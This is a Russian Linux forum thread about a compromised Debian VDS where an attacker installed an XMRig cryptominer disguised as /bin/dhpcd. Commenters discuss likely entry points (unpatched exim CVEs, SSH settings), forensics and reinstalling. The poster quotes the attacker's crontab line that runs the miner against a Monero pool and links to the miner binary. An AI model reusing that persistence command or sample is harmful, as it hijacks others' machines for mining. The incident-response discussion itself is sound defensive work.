LINUX.ORG.RU

VDS взломали

 ,


1

4

Ничего не сломали, ничего не украли (вроде), а повесили майнер, судя по процессу /bin/dhpcd который работает в 6 потоков и кушает 100% ядра.

Ссылка на скачивание: http://spfng.com/dhpcd

# uname -a
Linux spfng 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64 GNU/Linux

Я его прибил, в /bin/dhpcd написал bash-записку, чтобы со мной связались. В 00:00 по MSK файл восстановился, процесс снова запустился (пока я спал). Наверное, это просто скриптом всех подряд брутфорсят, а не направленная атака (никому не нужный Джо, ага).

Мне, в общем-то пофиг, это всего-лишь расходник, переустановил ОС и живёшь дальше. У SSH стоит авторизация по ключам. Может быть через exim? Да пофиг. Просто вот что бывает, если «один раз настроил и забыл».

Я знаю, что установи я свой уютненький CRUX, ничего бы такого не случилось. Не даром я не доверяю дистрибутивам типа Debian, CentOS, потому что хрен знает, что там внутрях у него крутится.

Любопытно только, каким образом, как. Такое-то решето!

Переустанавливать систему пока не тороплюсь. Если подскажете, куда копать, чтобы найти уязвимое место — было бы здорово. А нет так нет. Перекачусь на CRUX.

★★★★★

Зависит от того что у тебя на серваке крутится. По любому надо смотреть логи, и проверять все пакеты на аутентичность.

Я думаю что переустановка системы не поможет, ведь уязвимость останется.

Wind ★★★
()

Если подскажете, куда копать, чтобы найти уязвимое место — было бы здорово.

Ну так всё уже система скомпрометирована, наиболее вменяемый вариант перекатится на любимый CRUX.

slimsim
()

админы vds провайдера развлекаются ))

anonymous
()
Ответ на: комментарий от slimsim

Вот и нужно выяснить как это было сделано.

Wind ★★★
()

Откуда такая уверенность, что в crux нет той же дыры.

Deleted
()

Не даром я не доверяю дистрибутивам типа Debian, CentOS, потому что хрен знает, что там внутрях у него крутится.

Конечно, это ведь не дистрибутивы с 3.5 пакетами :D

RedEyedMan666
()

Я знаю, что установи я свой уютненький CRUX, ничего бы такого не случилось.

Хм?

Zhbert ★★★★★
()

Не даром я не доверяю дистрибутивам типа Debian, CentOS

Systemd?

torvn77 ★★★★★
()
Последнее исправление: torvn77 (всего исправлений: 1)

Ничего не сломали

а повесили майнер

Запустили процесс на хоте == сломали, причём в щепки

Я знаю, что установи я свой уютненький CRUX, ничего бы такого не случилось.

Ну, не факт =)

Если подскажете, куда копать

Позволить сделать это ещё раз, сделать снимок системы (как угодно) хоть рекурсивно ls на всё сделать или Inotify. Далее как только появится процесс майнера сделать ещё раз снимок, логов, файлов, процессов . И погасить систему, автоматически естественно. Причём резко так что бы майнер не успел что-то сделать. Затем по снимкам выяснить, что, когда и где появилось. Как запустись и кем. Родительский процесс чей? Ну и всё дело в шляпе.

LINUX-ORG-RU ★★★★★
()
Последнее исправление: LINUX-ORG-RU (всего исправлений: 2)

Спуф, вот скажи честно, ты после обнаружения пытался найти подобные кейсы? Или как обычно ограничился своим тупым «я сам»? Вопрос скорее риторический, потому-что не факт что смена дистра изменит ситуацию.

ilinsky ★★★★★
()
Последнее исправление: ilinsky (всего исправлений: 2)

да ладно, тупняк уровня спуфа наверняка. что то из разряда авторизации по ключам с неотключенным логином, рутом, дефолтным портом, игнор логов здравствуй брут.

Anoxemian ★★★★★
()

По теме - возьми open-scap и посмотри, что но скажет.

Я знаю, что установи я свой уютненький CRUX, ничего бы такого не случилось.

Вот нифига не угадал. Большая часть уязвимостей (после тупых админов) - это application-layer, и их наличие зависит не от дистрибутива, а от того, какой софт установлен

Не даром я не доверяю дистрибутивам типа Debian, CentOS, потому что хрен знает, что там внутрях у него крутится.

Ты точно знаешь, что крутится внутри твоего уютного апача/nginx-а?

CaveRat ★★
()
Последнее исправление: CaveRat (всего исправлений: 1)

А что еще за сервисы крутятся помимо ssh?

anonymous
()

Вопрос совсем тупой, но пароли ssh все поменял? Логи подключений смотрел?

Какие вообще сервисы на твоем сервачке крутятся? web, mail, proxy, ssh, vpn-шлюз?

CaveRat ★★
()
Ответ на: комментарий от CaveRat

ну вот картинко: https://files.catbox.moe/adjrf6.png

jabberd2, nginx со статикой (php-fpm просто так, нигде не используется), exim, и чатики (mcabber | irssi).

на вдс ничего ценного, тупо почта для спама (для регистрации на сайтах) и чатики крутятся. это вдс-однодневка, сегодня есть, завтра нет. принимает на себя все «атаки», проксирует безопасный трафик до домашнего nginx (чтобы не светить домашний провайдерский IP). поэтому отношение соответствующее, никаких обновлений не делал. вот и поплатился.

надо в crontab-e пихать apt-get update && apt-get upgrade теперь :)

Spoofing ★★★★★
() автор топика
Ответ на: комментарий от Spoofing

exim

Там недавно дыра была, надо было вовремя обновлять.

anonymous
()
Ответ на: комментарий от Wind

прикольно, спасибо, воспользуюсь этой утилитой для обновлений безопаности.

Spoofing ★★★★★
() автор топика

Я знаю, что установи я свой уютненький CRUX, ничего бы такого не случилось.

Да! Ведь ты проинспектировал все исходники всего софта который идет в комплекте с CRUX!

reprimand ★★★★★
()
Ответ на: комментарий от Anoxemian

Не обязательно, что именно на сервере уязвимость. Могли с его рабочей машины ключи стянуть.

Deleted
()

а какой у тебя был пароль на SSH, не слишком ли короткий

Harald ★★★★★
()
Ответ на: комментарий от Radjah
# crontab -e
36 * * * * /bin/dhpcd -o de.minexmr.com:4444 -B >/dev/null 2>/dev/null

какой вы проницательный. :) но механизм возникновения /bin/dhpcd ещё остался загоднойж.

Spoofing ★★★★★
() автор топика

К серверам часто перебирают пароли к SSH. Не конкретных людей, просто кого попало. Мой рекорд - через минуту, после аренды сервера и установки ОС. Решил отключением входа по паролю.

Я знаю, что установи я свой уютненький CRUX

Получилось бы то же самое.

Deleted
()
Ответ на: комментарий от Deleted

К серверам часто перебирают пароли к SSH. Не конкретных людей, просто кого попало. Мой рекорд - через минуту, после аренды сервера и установки ОС. Решил отключением входа по паролю.

Это где такие пароли?

При создании нового инстанса ОС на VDS, обычно пароль рута а ля to5nai4Rairu2e.

Deleted
()
Ответ на: комментарий от Deleted

Это где такие пароли?

Не в смысле, что через минуту взломали, а начали брутить пароль

Deleted
()

В 00:00 по MSK файл восстановился

Прям по крону)

Kuzz ★★★
()

Угадай спуфинга по посту. BTW, вангую простой пароль рута и неотключенный вход по паролям.

BTW, тут недавно в битриксах замечал побитый постфикс. Может и здесь через почту зашли…

dhameoelin ★★★★★
()
Ответ на: комментарий от Spoofing

У тебя правда пользовательский софт от рута запущен, или ты нас троллишь?

dhameoelin ★★★★★
()

Твой dhcpd это:

/home/den/mydata/build_xmrig-5.2.0_on_Alpine_3.10/xmrig-5.2.0/scripts/build/...
XMRig High performance, open source, cross platform miner.

Это легальный майнер, который используют ботнеты.

Судя по скриншоту процессов и, судя по тому, что это непатченная Debian, то, с огромной вероятностью, что-то в духе этого:

- https://security-tracker.debian.org/tracker/CVE-2019-10149

- https://security-tracker.debian.org/tracker/CVE-2019-15846

- https://security-tracker.debian.org/tracker/CVE-2019-16928

И ещё что-то было. Стоит проверить - пропатчено ли. Если пропатчено - значит с другим сервисом проблемы. Но, скорее всего, оно самое.

И да, просто обновить систему теперь не вариант. Ибо могли инжектировать руткит после эксплуатации уязвимости. Систему в любом случае придёться переустановить.

anonymous
()

Только с нуля. Остальное полумеры.

kardapoltsev ★★★★★
()
Ответ на: комментарий от CaveRat

Вангую, что у него был открыт root доступ по ssh, и пароль 12345, так что не только ключами боты логинятся. Мож, провайдер vds уже в образе кривые настройки ssh поставил

menangen ★★★★★
()
Ответ на: комментарий от Spoofing

Дай вывод openscap.

И, серьезно, посмотри логи ssh-подключений на предмет подозрительных входов. Смотри примерно вокруг тех моментов, когда у тебя майнер поднимался.

CaveRat ★★
()
Ответ на: комментарий от CaveRat

криво настроенный ssh

Что это значит? В оппосте написано, вход по ключам. Даже если включен логин по паролям, у спуфинга пароль не qwerty, никто не брутит целенаправленно нищевдсы больше чем по обычному вордлисту.

anonymous
()
Ответ на: комментарий от anonymous

Еще он прямым текстом пишет, что стоит exim без обновлений.

anonymous
()
Ответ на: комментарий от anonymous

Что это значит? В оппосте написано, вход по ключам.

То, что вход по паролю мог быть и не отключен.

Даже если включен логин по паролям, у спуфинга пароль не qwerty, никто не брутит целенаправленно нищевдсы больше чем по обычному вордлисту.

А какой у него пароль - мы не знаем.

CaveRat ★★
()

сначала раскажи, как ОС защищал...

darkenshvein ★★★★★
()

Спуфя опять таблеточки забыл накатить. А ему в это время накатили майнер. Ну, хорошо хоть на бутылку не посадили. За крукс давно пора натянуть эту жирную сволочь.

anonymous
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.